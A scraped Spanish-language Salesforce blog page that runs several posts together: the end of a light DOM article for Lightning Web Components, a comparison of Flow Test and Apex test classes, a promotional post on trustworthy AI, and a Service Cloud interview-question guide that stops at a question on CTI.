
mascotChanger.html

<dx-code-block title language="html" code-block="

«>

mascotChanger.js

mascotaNombreInput.html

<dx-code-block title language="html" code-block="

«>

mascotaNombreEtiqueta.html

<dx-code-block title language="html" code-block="

«>

Tenga en cuenta que Salesforce está trabajando actualmente con el W3C para agregar nuevos estándares, de modo que el DOM oculto nativo pueda participar en estos patrones de accesibilidad. Esto significa que, en el futuro, este caso de uso ligero de DOM no será necesario. Como parte de nuestros esfuerzos de accesibilidad, también patrocinamos a Igalia para implementar parcialmente ARIA Element Reflection , que ahora es totalmente compatible con Safari y parcialmente con Chrome. Si quieres saber más sobre este tema, echa un vistazo a nuestra propuesta cross-root-aria , el repositorio para el grupo de trabajo Modelo de objetos de accesibilidad .

La siguiente tabla resume los casos de uso y dónde se admiten.

Experiencia en la nube Experiencia relámpago Aplicaciones móviles de Salesforce LWC OSS/LWR en Node.js*
Soporte de bibliotecas que necesitan acceso a las partes internas de los componentes.
Implementación más sencilla de componentes profundamente anidados
Estilo global No No
Implementación más flexible de las mejores prácticas de accesibilidad

*Si se utiliza DOM de sombra nativo en lugar de sombra sintética . La sombra nativa es la opción predeterminada para LWC OSS y LWR en Node.js.

Otras Consideraciones

Cuando se trabaja con DOM ligero, hay algunas consideraciones adicionales a tener en cuenta, entre ellas:

  • Los eventos no se reorientan con DOM ligero. Lea más en la guía para desarrolladores .
  • No hay soporte de navegador para espacios fuera del DOM oculto, por lo que se emula. Esto implica que algunas funciones, como los enlaces de ciclo de vida, no están disponibles en ellos. Eche un vistazo a la documentación para saber más.
  • Por ahora, los componentes ligeros habilitados para DOM no se pueden empaquetar.

Conclusión

En esta publicación de blog, revisamos qué es el DOM ligero, los casos de uso que permite y las consideraciones a tener en cuenta para decidir qué componentes habilitarán la función. Todos los ejemplos que se muestran en este blog se encuentran en un repositorio de GitHub que puedes probar tú mismo.

Para obtener más información sobre DOM ligero en la plataforma Salesforce, lea la documentación o, si está trabajando fuera de la plataforma, lea la documentación OSS .

Si decide seguir adelante y transformar sus componentes DOM ocultos en componentes DOM claros, consulte esta herramienta creada por Salesforce Engineering para simplificar la migración.

Sobre el Autor

Alba Rivas trabaja como Principal Developer Advocate en Salesforce. Puedes seguirla en Linkedin , Twitter o GitHub .

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

Uso de prueba de flujo versus clase de prueba para flujo en Salesforce

Uso de prueba de flujo versus clase de prueba para flujo en Salesforce

Introducción de la prueba de flujo

Anteriormente, si queríamos probar el flujo, necesitábamos escribir una clase de prueba de Apex para el flujo. Con la versión Summer '22, Salesforce introdujo un marco de prueba para flujos activados por registros para automatizar las pruebas de flujos. Ahora podemos dejar que Salesforce pruebe el flujo, asegurarnos de que los resultados cumplan con las expectativas y resaltar cuando no lo sean. Ahora podemos crear y ejecutar pruebas dentro del propio generador de flujo, de forma declarativa sin escribir ningún código.

Cómo funciona

Establecer detalles de prueba, desencadenante y ruta

Proporciona una etiqueta de prueba de flujo y una descripción de la prueba. Establezca el activador de prueba en Creado/actualizado según el escenario. La ruta de la prueba está configurada para Ejecutar inmediatamente.

imagen.png Establecer registro de activación inicial/actualizado

Usando la función de búsqueda, podemos buscar el registro para usarlo como plantilla inicial. Tras la selección del registro, los campos se completan a partir del registro seleccionado. La prueba hereda los valores de campo del registro seleccionado. Sin embargo, podemos modificar los valores de estos campos antes de finalizar la prueba. La prueba no está vinculada a este registro pero contiene y utiliza sus valores de campo.

imagen.png Establecer afirmaciones

La aserción es una forma de comparar el resultado real con el resultado previsto. Si coinciden, entonces la afirmación se evalúa como verdadera. De lo contrario, la afirmación falla. Escriba las siguientes afirmaciones para garantizar que se cumplan los criterios de entrada de registros para el flujo y se logre el resultado esperado.

imagen.png Ejecutar prueba y ver detalles

Haga clic en el botón "Ver pruebas", seleccione el menú desplegable de la prueba de flujo que queremos ejecutar y seleccione Ejecutar prueba y ver detalles.

imagen.png La prueba de flujo se ejecuta y resalta el camino que tomó la prueba. Si necesitamos probar el flujo, simplemente podemos ejecutar la prueba. Ya no es necesario configurar los datos de prueba mediante programación. ¡Esto aumenta la eficiencia de las pruebas! Si necesitamos realizar una mejora en este flujo en el futuro, necesitaremos actualizar el registro de prueba asociado en consecuencia.

imagen.png Beneficios

  1. Fácil y cómodo de usar: podemos crear registros de prueba a través de la interfaz de usuario y ponerlos a prueba.
  2. Tiempo y esfuerzo: reduce el tiempo y el esfuerzo necesarios, ya que no necesitamos escribir código, solo crear registros desde la interfaz de usuario y realizar afirmaciones.
  3. No afectará la cobertura del código existente a nivel de clase: si migramos cualquier funcionalidad del activador al flujo, la lógica subyacente del activador/clase también se limpia manualmente como parte de este ejercicio. Esto no reducirá la cobertura del código de la clase ya que la lógica se elimina por completo.
  4. Cobertura de la prueba de flujo: el porcentaje de cobertura no se captura en la prueba de flujo como podemos hacerlo a través de la clase Apex. Más bien es capaz de cubrir nodos. Una vez seleccionamos “Ejecutar prueba y ver detalles”. La ruta resaltada en amarillo representará la cobertura real del flujo desde el principio hasta el final del nodo.

imagen.png

imagen.png

imagen.png Desventaja

  1. Solo puede crear pruebas de flujo para crear, actualizar o crear/actualizar flujos activados por registros. Aún no se admite la eliminación de flujos activados por registros. – Solo para el escenario de eliminación de registros podemos escribir una clase de prueba
  2. Puede afectar la cobertura general: dado que la cobertura de prueba general se calcula en función de la cobertura de prueba de todas las clases combinadas (promedio), si migramos cualquier característica que tenga una cobertura de prueba más alta en la clase ápice relevante, podría reducir el porcentaje de cobertura general del código. (Como actualmente solo nos estamos enfocando en migrar el activador relacionado con la cuenta para fluir, solo se ve afectada 1 clase de prueba, por lo que no hay cambios significativos en la cobertura del código Apex).
  3. Las pruebas de flujo no admiten rutas de flujo que se ejecuten de forma asincrónica. Sin embargo, no tenemos flujo asíncrono en nuestra organización. Estamos creando flujos para cubrir escenarios que se ejecutan sincrónicamente.

Recomendación

  • Podemos comenzar a dar pasos para pasar a la prueba de flujo a medida que Salesforce realiza mejoras continuas en el flujo, por lo que en versiones futuras, podemos esperar que la prueba de flujo incluya más mejoras y reduzca las limitaciones.
  • Podemos comenzar escribiendo una prueba de flujo para las actualizaciones rápidas de campos (antes) de los flujos de activación de registros.
  • Mejorar la cobertura de prueba de las clases que tienen menos cobertura para que podamos usar la prueba de flujo.

Preguntas más frecuentes

¿Cuál es el porcentaje de cobertura para implementar Flow?

En relación con las pruebas de Apex, las pruebas de flujo no se consideran parte de la cobertura de pruebas como en el 75%+ para el despliegue de productos.

¿Brindan cobertura de código como lo hace la clase de prueba? Si no, ¿debemos pensar en eliminar el flujo de la cobertura de prueba?

Sí, cubren resaltando nodo por nodo.

¿Puede confirmar si la prueba de flujo permite ejecutar pruebas masivas?

No, no admite pruebas de registros masivos. En la mayoría de los escenarios relacionados con desencadenantes, hemos creado un registro individual en la clase de prueba y verificamos los escenarios de prueba. Si reemplazamos esos desencadenantes con flujos, no habrá una gran diferencia en los casos de prueba.

¿La prueba de flujo admite la asincronía?

Las pruebas de flujo no admiten rutas de flujo que se ejecuten de forma asincrónica. Sin embargo, no tenemos flujo asíncrono en nuestra organización. Estamos creando flujos para cubrir escenarios que se ejecutan sincrónicamente.

¿Cuál es el rendimiento de las pruebas de flujo en comparación con las clases de prueba?

No veo ninguna documentación oficial, pero creo que la prueba de flujo será más rápida en comparación con la clase de prueba porque cuando ejecutamos una prueba creará una instancia de la clase y llamará a métodos individuales. Podemos ejecutar casos de prueba individuales utilizando una prueba de flujo, pero no es posible ejecutar un solo método individual desde la clase de prueba, lo que lleva mucho tiempo.

Referencia

Prueba de flujo (beta)

Consideraciones para probar el flujo

50% Me gusta VS
50% No me gusta
Seguir leyendo

Genere confianza con sus clientes en la era de la IA

Genere confianza con sus clientes en la era de la IA

En una era dominada por la IA, la importancia de la confianza ha alcanzado nuevas alturas. A medida que los líderes de la industria navegan a través de la disrupción y la innovación, establecer y fomentar la confianza con los empleados y clientes es más que una necesidad. Es un imperativo estratégico.

La IA generativa tiene el potencial de aportar hasta 4,4 billones de dólares anuales a la economía mundial. Esto muestra el impacto monumental que la IA puede tener en varios sectores. Y la IA tiene la capacidad de automatizar el 40% de la jornada laboral promedio . Teniendo esto en cuenta, no podemos subestimar la influencia de la IA en la optimización de los procesos y la eficiencia. Es hora de reconocer el poder que tiene la IA confiable para mejorar la experiencia del cliente. Esto, a su vez, enfatiza la importancia de generar y mantener la confianza.

Cubriremos cómo podemos utilizar el papel esencial de la confianza en la adopción de plataformas de IA . También exploraremos cómo los beneficios de la IA pueden generar (y fortalecer) la confianza de los clientes.

Comience con AI Coach

Los servicios profesionales de Salesforce pueden ayudarle a establecer las bases adecuadas para el éxito con nuestro nuevo paquete, AI Coach.

La búsqueda de una IA confiable

Vivimos en un mundo donde tanto las empresas como los clientes cuestionan la confiabilidad de la IA . Esto es especialmente cierto cuando a la IA se le confía el activo más sensible: los datos de los clientes. De hecho, el 78% de los clientes dicen que cambiarían de proveedor de servicios financieros si sintieran que sus datos fueron mal manejados. Para las empresas, esto resalta la importancia crítica de salvaguardar la información de los clientes.

Pero ¿y si le dijéramos que la IA no tiene por qué ser un obstáculo para la confianza? ¿Que en realidad puede ser el puente que conecte a las empresas y sus clientes sobre una base de IA confiable? Sí, lo leiste bien. La adopción de la IA ha aumentado un 88 % entre 2020 y 2022, lo que demuestra el creciente reconocimiento del potencial de una IA confiable para crear impactos positivos y al mismo tiempo mantener la confianza.

Los cuatro pilares de la confianza

Antes de profundizar en las formas en que la IA puede moldear la confianza, analicemos los cuatro pilares esenciales sobre los que se construye la confianza. Estos pilares desempeñan un papel vital a la hora de establecer una base de IA confiable en la que los clientes puedan confiar.

  • Competencia: el núcleo de la confianza reside en la capacidad de ofrecer resultados, no promesas. Para aclarar, su plataforma de IA no sólo debe ser experta en resolver problemas, sino también ser capaz de demostrar su eficacia.
  • Fiabilidad: la coherencia es clave. Una IA confiable debe cumplir constantemente las expectativas y cumplir los compromisos, creando una sensación de confiabilidad.
  • Integridad: la transparencia y la honestidad forman la base de la confianza. Asimismo, es crucial abordar las limitaciones y los riesgos potenciales de manera abierta y ética.
  • Intención: Alinear sus propias motivaciones con el éxito del cliente muestra una dedicación genuina a sus necesidades y objetivos.

Fomentar la confianza a través de la IA

Ahora que entendemos los cuatro pilares de la confianza, vamos a aprovecharlos y ver cómo podemos fomentar la confianza con la IA. ¿Cómo podemos tomar la IA, que a menudo se considera un disruptor, y convertirla en el aliado que refuerza la confianza y la lealtad ? Exploremos algunos escenarios.

Demostrar competencia:

  • Comparta historias de éxito: muestre el impacto de su plataforma de IA a través de estudios de casos convincentes y ejemplos del mundo real. Por ejemplo, resalte los desafíos que enfrentaron sus clientes y cómo su plataforma brindó soluciones innovadoras. Estas historias de éxito actúan como testimonio de su competencia.
  • Visualice resultados: utilice la visualización de datos para traducir resultados complejos en imágenes claras y comprensibles. Podrá demostrar la eficacia de su plataforma y también mejorar la comprensión del cliente.

Garantizar la fiabilidad:

  • Establezca expectativas claras: establezca el alcance, el cronograma y los resultados de los proyectos desde el principio. Esta transparencia permite a los clientes esperar resultados y comprender el camino que les espera.
  • Supere las expectativas: vaya más allá de lo básico. Entregue proyectos antes de lo previsto, ofrezca información adicional o proporcione recomendaciones que se alineen con su compromiso con el éxito del cliente.

Impulsar la transformación continua con
La Oficina de Innovación Continua

Los servicios profesionales de Salesforce pueden ayudarle a elevar sus capacidades para obtener el máximo valor de su
Inversión en Salesforce.

Defender la integridad:

  • Documentación transparente: comparta cómo funciona su plataforma de IA, incluidas sus fuentes de datos y algoritmos. La comunicación transparente le ayudará a generar confianza y aclarar cualquier confusión.
  • Compromiso ético: enfatice su dedicación a las prácticas éticas de IA y la seguridad de los datos. Asegúrese de compartir cómo sigue las pautas éticas y las normas de privacidad de datos. Al hacerlo, tranquilizará a los clientes sobre su integridad.

Intención de exhibición:

  • Soluciones personalizadas: adapte sus soluciones de IA para que coincidan con los objetivos específicos de su cliente . Muestre cómo está diseñada su plataforma para abordar sus requisitos únicos. Como resultado, reforzará lo importante que es para usted su éxito.
  • Alineación continua: mida y comunique periódicamente cómo sus soluciones de IA contribuyen no solo a los objetivos del cliente sino también a sus objetivos de sostenibilidad más amplios. Esta alineación continua subraya su dedicación a su éxito y su compromiso con la responsabilidad ambiental en toda la asociación.

Al integrar estos pilares en su estrategia de IA, abordará las preocupaciones sobre la confianza y podrá posicionar la IA como un catalizador para la creación de confianza.

Un futuro de confianza con IA

A medida que la IA continúa transformando las industrias, no podemos exagerar la importancia de la confianza. En Salesforce Professional Services , reconocemos que la confianza es primordial en el mundo de la IA confiable. Nuestro equipo dedicado está listo para guiarlo a través de este panorama transformador.

Salesforce Professional Services ofrece una oportunidad única a las organizaciones que inician su viaje hacia la IA. Adopte AI Coach y aproveche nuestra experiencia para maximizar el potencial de la IA. Trabajamos con usted para escalar y personalizar las experiencias de los clientes alineándonos con los resultados comerciales, construyendo un camino hacia el valor comercial, preparándonos para la entrega inmediata y estableciendo una hoja de ruta para el estado futuro que esté alineada con su visión y objetivos.

Con un historial de implementaciones exitosas de IA y un compromiso con las prácticas éticas, ofrecemos experiencia que va más allá de la tecnología: es una asociación basada en la confianza.

Mark Wakelin

Mark Wakelin , vicepresidente ejecutivo de servicios profesionales globales

Ejecutivo senior con experiencia como director ejecutivo y director de éxito de la plataforma Salesforce, gestionando organizaciones con más de 10 000 empleados y ventas superiores a los 3 mil millones de dólares. Más de 30 años de experiencia en ERP, Front-Office, computación en la nube, SaaS e IA generativa, impulsando la innovación y el valor empresarial. Enfocados en la diversidad, la inclusión y la igualdad en el lugar de trabajo, con un compromiso con la filantropía. Aproveche su profunda experiencia financiera y técnica para lograr el éxito.

Más de Mark

Seguir leyendo

🚀 Guía definitiva de 150 preguntas sobre Salesforce Service Cloud: ¡domine cada detalle! 🌟

Servicio_nube

Temas cubiertos en la entrevista de Salesforce Service Cloud:

  • Conocimientos generales y características
  • Gestión de casos
  • Soluciones y base de conocimientos
  • Consola de servicio
  • Portales/comunidades de clientes y agentes
  • Flujo de trabajo y automatización:
  • Informes y paneles en Service Cloud
  • Integración de CTI y telefonía
  • Servicio al cliente en redes sociales
  • Chat y mensajería
  • Integración de correo electrónico
  • Métricas y análisis de rendimiento
  • Inteligencia artificial (IA) en la nube de servicios
  • Servicio de campo
  • Macros
  • Preguntas basadas en escenarios

Conocimientos generales y características

1. ¿Qué es Salesforce Service Cloud?

– Imagine que dirige una empresa y tiene toneladas de clientes que hacen preguntas o tal vez tienen problemas con su producto. Ahora, desea ayudarlos de manera rápida y eficiente. ¡Ahí es donde entra Salesforce Service Cloud!

2. ¿Cómo beneficia Service Cloud a un departamento de atención al cliente?

niño, niño, juego, malabarismo, pelota, vector, aislado, 18804576, arte vectorial, en, Vecteezy

Como empresa, usted maneja cosas agitadas que pueden ponerse cuando los clientes lo llaman, le envían correos electrónicos o le hacen ping en las redes sociales. ¡Es como hacer malabares! Service Cloud es como un asistente súper inteligente que ayuda a atrapar esas pelotas. Realiza un seguimiento de todos los problemas de los clientes (llamados "casos" en Salesforce), se asegura de que los vea la persona adecuada y proporciona respuestas que su equipo puede utilizar para responder más rápido.

¿La mejor parte? Puede conectarse con sus clientes dondequiera que estén: por teléfono, en las redes sociales, lo que sea. ¡Menos caos, más choca esos cinco en la oficina!

3. ¿Cuál es la diferencia entre Salesforce Sales Cloud y Service Cloud?

Paseo en coche (#1) - Openclipart

Piense en su negocio como en un automóvil. Sales Cloud es como el motor que lo impulsa hacia adelante: lo ayuda a encontrar nuevos clientes y los convence para que se sumen. Estamos hablando de gestionar contratos, realizar un seguimiento de las ventas y realizar previsiones. Ahora bien, ¿la nube de servicios? Ese es su sistema de dirección y comodidad. Una vez que los clientes están a bordo, se garantiza que estén contentos durante el viaje. Atiende sus preguntas, resuelve cualquier problema y se asegura de que disfruten tanto del viaje que querrán viajar contigo nuevamente.

4. ¿Qué es OmniCanal en el contexto de Service Cloud y cómo beneficia a una empresa?

OmniCanal es una forma para que su empresa hable con los clientes dondequiera que prefieran: redes sociales, correo electrónico, teléfono o incluso chat en vivo. Pero es inteligente; garantiza que su equipo no se sienta abrumado y que las preguntas de sus clientes lleguen a la persona adecuada que pueda responderlas mejor.

5. ¿Cómo mejora Service Cloud la satisfacción del cliente?

Conocer bien a sus clientes y satisfacer sus necesidades rápidamente no sólo los deja satisfechos; ¡Puede convertirlos en fanáticos de tu marca! Además, los clientes satisfechos a menudo significan que volverán y les dirán a sus amigos lo fantástico que eres: ¡todos ganan!

Gestión de casos

1.¿Qué es un caso en Salesforce?

– Imagínese esto: un cliente tiene una pregunta o tiene problemas con su producto. Piden ayuda. ¿Ese mensaje de ayuda? En Salesforce, a eso lo llamamos "caso".

2.¿Cómo se pueden crear casos en Salesforce?

Los casos son como boletos. En Salesforce, los casos pueden surgir de todas partes: un cliente envía un correo electrónico, completa un formulario en su sitio web, le envía un mensaje en las redes sociales o incluso llama. Cada una de estas acciones puede iniciar un caso para que su El equipo sabe que alguien necesita una mano.

3. ¿Qué es Web-to-Case y cómo se utiliza?

¿Sabes cómo puedes pedir tu café con anticipación en una aplicación y te estará esperando cuando llegues? Web-to-Case es algo así, pero para servicio al cliente. Permite a sus clientes completar un formulario en su sitio web cada vez que necesitan ayuda, y esa información se envía directamente a Salesforce como un caso. De esta manera, su equipo de servicio al cliente puede comenzar a desarrollar soluciones de inmediato.

4. ¿Explicar el correo electrónico para enviar casos?

Piense en Email-to-Case como un puente entre su bandeja de entrada de correo electrónico de servicio al cliente y Salesforce . Cuando sus clientes le envían un correo electrónico pidiéndole ayuda, Email-to-Case lo detecta y lo convierte en un caso en Salesforce.

5. ¿Qué es la escalada de casos y cómo se configura?

Una captura de pantalla de una computadora Descripción generada automáticamente

A veces, las cosas necesitan un poco más de urgencia, como una entrega de pizza en 30 minutos o menos. La escalada de casos ocurre cuando un caso no se ha resuelto en un cierto período de tiempo y sube en la lista de prioridades o incluso se entrega a un gerente. En Salesforce, esto se configura creando reglas de escalamiento que controlan el tiempo de los casos y activan una señal de alerta cuando uno está tardando demasiado.

6. ¿Cómo funcionan las reglas de asignación de casos?

Señales manuales de emergencia de la policía de tránsito para conductores: conduzca en Malasia

Las reglas de asignación son como los policías de tránsito de Salesforce. Observan los nuevos casos que llegan y les indican la dirección correcta. Según los detalles del caso, como de qué se trata o de quién proviene, estas reglas los envían al departamento correcto o a la persona más adecuada para ayudar. Mantiene las cosas en movimiento sin problemas.

7. ¿Qué son las colas de casos y en qué se diferencian de las reglas de asignación?

Las reglas de asignación dirigen los casos a personas específicas de inmediato, mientras que las colas les permiten esperar en un lugar relevante para que los tome cualquier miembro disponible del equipo.

8. ¿Cómo se realiza un seguimiento del historial del caso?

Realizar un seguimiento del historial de un caso en Salesforce es como tener un mapa de dónde ha estado, a quién ha visitado y qué se ha hecho hasta el momento. Cada vez que alguien ve el caso, realiza un cambio o agrega algo, Salesforce toma nota de ello. Así, cualquiera que observe el caso podrá ponerse al día con su recorrido.

9. ¿Qué son los equipos de casos?

Los equipos de casos en Salesforce son como grupos de proyectos en la escuela. Puede formar un equipo de varios usuarios con diferentes roles para colaborar y resolver un caso de manera eficiente.

10. ¿Cómo se utilizan los feeds de casos?

Los feeds de casos son como líneas de tiempo de las redes sociales para cada caso. Muestran una vista cronológica de todas las actividades, como mensajes, cambios de estado o acciones del usuario, relacionadas con un caso.

11. ¿Puedes realizar un seguimiento del tiempo dedicado a cada caso?

Sí, con funciones de seguimiento del tiempo. Es como un cronómetro del trabajo: puede medir cuánto tiempo dedican los agentes a cada caso.

12. ¿Cómo maneja Salesforce los correos electrónicos masivos en la gestión de casos?

Salesforce le permite enviar correos electrónicos masivos para mantener actualizados a muchos clientes a la vez.

13. ¿Qué son los hitos del caso?

Los hitos son como puntos de control en una carrera. Son objetivos específicos que los agentes deben alcanzar dentro de un plazo determinado mientras resuelven un caso.

14. ¿Cuál es la diferencia entre un caso y una orden de trabajo?

Un caso es un registro de un problema de un cliente, mientras que una orden de trabajo es una solicitud de trabajo, a menudo utilizada para servicios de campo o tareas físicas.

15. ¿Cuáles son los beneficios de utilizar Chatter para los casos?

Chatter es como una sala de chat para el trabajo. Los agentes pueden discutir casos, compartir archivos y obtener comentarios de los miembros del equipo directamente en el registro del caso.

16. ¿Cuáles son los componentes de la regla de asignación de casos en Salesforce?

En Salesforce, la regla de asignación de casos giraba en torno a dos componentes principales, como la regla de caso y los criterios de caso.

Regla de caso: una regla de caso define una o más de una condición que debe cumplirse para ser asignada a un usuario específico. Podemos agregar tantas entradas de reglas como queramos a una sola regla de asignación.

Criterios de caso: Los criterios de caso son las condiciones que se basan en diferentes factores como el origen del caso, el estado, el tipo, etc.

Soluciones y base de conocimientos

1. ¿Qué es el conocimiento de Salesforce?

Salesforce Knowledge es como una carpeta para toda la información que su equipo necesita para ayudar a los clientes. Es un lugar donde puedes almacenar artículos, preguntas frecuentes, guías de solución de problemas y más, todo organizado y fácil de encontrar.

2. Explicar el proceso de creación y mantenimiento de una Base de Conocimiento en Salesforce.

Crear una base de conocimientos es como abastecer una biblioteca. Empiece por escribir artículos; pueden ser preguntas frecuentes, guías prácticas o pasos para la solución de problemas. Una vez que haya terminado, los colocará en los estantes (es decir, los publicará en Salesforce Knowledge) y así, estarán disponibles para que los lea su equipo o incluso sus clientes. Deberá revisar sus artículos con regularidad, actualizar la información anterior y seguir agregando material nuevo para mantener todo actualizado.

3. ¿Cuál es la diferencia entre Soluciones y Artículos de Conocimiento?

Libro. Antiguo libro de texto, enciclopedia, diccionario o libro de cuentos de hadas. Diseño de dibujos animados felices para niños, página para colorear, estampado de camisetas, icono, logotipo, etiqueta, parche, pegatina. SVG, cliparts, vectores y ilustraciones libres de derechos.

Las soluciones son como esas viejas enciclopedias : tienen información útil, pero son un poco básicas y solo su equipo puede leerlas. Por otro lado, los artículos de conocimiento son como tener una base de datos completa en línea. Son más dinámicos, pueden incluir videos e imágenes y puedes compartirlos no solo con tu equipo sino también con tus clientes.

4. ¿Cómo pueden los usuarios de Service Cloud aprovechar los artículos de conocimiento?

Piense en los usuarios de Service Cloud como bibliotecarios. Cuando un cliente tiene una pregunta, en lugar de hojear montones de libros o luchar para encontrar un experto, puede buscar el artículo de conocimiento correcto y tener las respuestas al alcance de su mano. Esto hace que ayudar a los clientes sea más rápido, más preciso y, sinceramente, mucho menos estresante.

5. ¿Pueden los clientes acceder a los artículos de conocimiento? ¿Si es así, cómo?

¡Por supuesto que pueden! Puede configurar una comunidad de clientes o un sitio web público donde estos artículos estén disponibles. Los clientes pueden ingresar, buscar lo que necesitan y, a menudo, resolver sus propios problemas sin tener que levantar el teléfono o enviar un correo electrónico.

Consola de servicio

1.¿Qué es la Consola de Servicio en Salesforce?

Ilustración de Chef y más Vectores Libres de Derechos de Adulto - Chef, Dibujos Animados, Gorro De Chef - iStock

Imagínese ser chef en una cocina ocupada y bien equipada. La Consola de servicio es como su estación de cocina, donde tiene sus ingredientes (datos del cliente), utensilios (herramientas y aplicaciones) y recetas (artículos de conocimiento), todo en un solo lugar. Estás allí, cocinando varios platos (manejando varios casos de clientes) a la vez. 🍳👩‍🍳🔥

2. ¿Cómo mejora la Consola de servicio la productividad de los agentes?

Si eres chef en una cocina, ¿no sería más fácil cocinar si todos tus ingredientes, utensilios y recetas estuvieran en un solo lugar? Eso es lo que hace la Consola de servicio por los agentes. Pone todo lo que necesitan en un solo lugar. Pueden chatear con los clientes, echar un vistazo al historial de su cuenta y comprobar sus pedidos, todo al mismo tiempo. ¡Es como tener superpoderes, para que puedan ayudar a los clientes más rápido y mejor!

3. ¿Se puede personalizar la Consola de servicio? Si es así, ¿cómo?

¡Por supuesto! Al igual que puedes reorganizar las aplicaciones en tu teléfono, puedes modificar la Consola de servicio para adaptarla a tus necesidades. Todo esto se hace a través de algo llamado "Creador de aplicaciones", donde arrastra y suelta los componentes que desea. Es como jugar un juego en el que diseñas tu centro de mando.

Portales/comunidades de clientes y agentes:

1. ¿Qué es una comunidad de clientes en el contexto de Service Cloud?

Dibujo infantil de CCC, bloques de colores – Catskill Community Center

Imagínese un centro comunitario en un vecindario. Es un lugar donde los residentes se reúnen para discutir temas, compartir noticias, pedir prestado herramientas o incluso organizar eventos. Ahora, imagine si su empresa tuviera un “centro comunitario” virtual para sus clientes. Esa es una comunidad de clientes en Salesforce. Es un espacio en línea donde sus clientes pueden reunirse para hacer preguntas, compartir ideas e incluso resolver problemas juntos. También pueden encontrar artículos o anuncios útiles que haya publicado, ¡muy parecido a un tablero de anuncios comunitario!

2. ¿En qué se diferencian los portales de agentes de los portales/comunidades de clientes?

Cree un portal de socios, habilite la cuenta de socio y los usuarios y agregue

En el centro comunitario, piense en el Portal del Cliente/Comunidad como el salón principal donde todos se reúnen, conversan y comparten. El Portal del Agente, sin embargo, es como la oficina administrativa que da al salón principal. Desde esta oficina, sus agentes de servicio al cliente pueden observar lo que sucede en la comunidad, intervenir para ayudar cuando sea necesario o proporcionar recursos.

3. ¿Cómo pueden los clientes utilizar las comunidades para autoservicio?

En una comunidad de clientes, los clientes pueden explorar los artículos que usted ha proporcionado, encontrar respuestas a preguntas comunes o hacer una nueva pregunta que cualquier miembro de la comunidad puede responder. Esto les permite encontrar soluciones en su propio tiempo y términos, sin necesidad de llamar directamente a la “oficina del administrador” (contactar con soporte).

4. ¿Cuáles son las mejores prácticas para crear una comunidad de clientes?

La comunidad de clientes de Salesforce debe ser fácil de usar y proporcionar valor real. Asegúrese de que sea de fácil acceso, con categorías claras para la discusión y una amplia base de conocimientos. Actualice y modere periódicamente el contenido para garantizar que sea relevante y apropiado. Fomente la participación reconociendo a los miembros activos u organizando eventos o desafíos comunitarios.

Flujo de trabajo y automatización

1. ¿Se puede automatizar el enrutamiento de casos? ¿Si es así, cómo?

En Service Cloud, los casos se pueden enrutar automáticamente. Puede establecer criterios, como si un caso proviene de un cliente VIP, va directamente a su mejor agente, o si es un problema común, va a cualquier agente disponible. De esta manera, todos reciben un servicio eficiente y eficaz.

2. ¿Cómo se automatiza el seguimiento del acuerdo de nivel de servicio (SLA) en Service Cloud?

¿Estás preparado para Domino's... - Domino's Pizza Bangladesh | Facebook

Imagínese el restaurante prometiendo que cada pedido se servirá en 30 minutos o, de lo contrario, será gratis. Para cumplir esta promesa, tienen un sistema que inicia una cuenta regresiva en el momento en que se realiza un pedido y alerta al gerente si llega a los 25 minutos. Service Cloud puede realizar un seguimiento de los SLA de forma similar. Puede establecer los plazos en los que los casos deben resolverse según su nivel de prioridad y automatizar recordatorios, escalamientos u otras acciones si esos plazos se acercan o no se cumplen. ¡Mantiene al equipo responsable y a los clientes contentos!

3. ¿Podría definir la Gestión de derechos en el contexto de Salesforce Service Cloud?

La gestión de derechos en Salesforce Service Cloud es una función que ayuda a las empresas a definir, hacer cumplir y realizar un seguimiento de los acuerdos de nivel de servicio (SLA) con sus clientes. Permite a las empresas establecer el nivel de soporte al que tiene derecho un cliente, en función de factores como garantías de productos, contratos de servicio o planes de soporte. Esta característica garantiza que los clientes reciban el soporte al que tienen derecho dentro del plazo acordado.

4. ¿Puedes explicar la funcionalidad de Visual SLA Timelines?

Los cronogramas visuales de SLA en Salesforce Service Cloud ofrecen una representación gráfica de los cronogramas asociados con cada SLA. Ayudan a los agentes de servicio a visualizar el tiempo restante necesario para resolver un caso según el SLA asociado. Esto permite a los agentes priorizar su trabajo de manera efectiva y garantizar el cumplimiento de los términos del SLA.

Informes y paneles

1. ¿Cómo mejoran los informes y paneles las operaciones de servicio?

Imagínese que al final de cada día, el gerente recibe un resumen de todo lo sucedido: cuántos clientes llegaron, cuál fue el plato más popular, cuántos elogios o quejas se recibieron, etc. En Service Cloud, los informes y paneles son como este resumen diario. Ofrecen a los directivos una visión rápida pero completa de cómo van las cosas. ¿Los clientes esperan demasiado? ¿Algunos problemas se resuelven más rápido que otros? Esta información ayuda al equipo a saber qué funciona y qué no, para que puedan mejorar su "servicio".

2. ¿Se puede realizar un seguimiento del rendimiento de los agentes con Service Cloud? Si es así, ¿cómo?

Service Cloud le permite realizar un seguimiento del desempeño de sus agentes. Puede ver cuántos casos han resuelto, qué tan rápido están trabajando e incluso cómo los clientes califican su servicio. Es como un gráfico de desempeño para los camareros, pero para sus agentes de servicio.

3. ¿Cuáles son algunas métricas de servicio comunes que puede rastrear en Service Cloud?

En el mundo de Service Cloud, las métricas comunes incluyen cosas como

  • tiempo promedio de resolución de casos
  • puntuaciones de satisfacción del cliente
  • tasas de resolución del primer contacto
  • volúmenes de casos por tipo o fuente

Integración de CTI y telefonía

1. ¿Qué es la Integración Telefónica Computadora (CTI)?

Representante De Servicio Al Cliente De Dibujos Animados De Forma Tridimensional De Persona De Negocios - Banco de fotos e imágenes de stock - iStock

Es un término para un sistema que permite que las computadoras interactúen con los teléfonos. Significa que cuando alguien llama, el sistema de atención al cliente sabe inmediatamente quién es y cuál es su historial con la empresa.

2.¿Cómo mejora CTI el servicio al cliente?

En el restaurante sin CTI, cada llamada de un cliente sería como una reunión de camareros durante la cena por primera vez. Tendrían que volver a hacer todas las preguntas básicas: "¿Tiene alguna alergia?" “¿Prefieres asiento junto a la ventana o en el pasillo?” etcétera. Con CTI, es como si el camarero ya te conociera. Te saludan por tu nombre, recuerdan que eres alérgico al maní, saben que te gusta el queso extra y tienen lista tu mesa favorita. En términos de atención al cliente, esto ahorra tiempo, personaliza la experiencia del cliente.

3. ¿Puede darnos un ejemplo de cómo se utiliza CTI en un escenario de call center?

